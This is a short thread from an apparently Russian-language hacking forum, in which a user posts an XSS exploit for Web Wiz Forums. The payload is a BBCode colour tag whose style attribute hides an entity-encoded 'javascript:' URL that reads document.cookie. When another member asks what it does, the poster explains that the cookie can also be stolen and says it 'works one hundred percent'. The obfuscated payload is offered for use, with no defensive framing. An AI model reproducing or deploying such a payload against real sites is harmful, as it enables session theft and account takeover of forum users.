Web Wiz Forums XSS bug

Discussion in 'Уязвимости' started by xPow, 18 Aug 2005.

  1. xPow

    xPow New Member

    Joined:
    23 Jun 2005
    Messages:
    26
    Likes Received:
    0
    Reputations:
    0
    http://www.forum.anonymous.ru/showthread.php?t=1038
    пример эксплоита:
    Code:
     [i][COLOR=black style=background:url(& #106;& #97;& #118;& #97;& #115;& #99;& #114;& #105;& #112;& #116;& #58;& #97;& #108;& #101;& #114;& #116;& #40;& #32;& #100;& #111;& #99;& #117;& #109;& #101;& #110;& #116;& #46;& #99;& #111;& #111;& #107;& #105;& #101;& #32;& #41; )] xPow [ antishare team ] [/COLOR][/i]
     
    #1 xPow, 18 Aug 2005
    Last edited by a moderator: 18 Aug 2005
  2. DRON-ANARCHY

    DRON-ANARCHY Отец порядка

    Joined:
    4 Mar 2005
    Messages:
    713
    Likes Received:
    142
    Reputations:
    50
    А в чем смысл того сплойта?
     
  3. xPow

    xPow New Member

    Joined:
    23 Jun 2005
    Messages:
    26
    Likes Received:
    0
    Reputations:
    0
    того: alert( document.cookie );
    но можно и своровать. работает сто процентов :)
     
  4. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0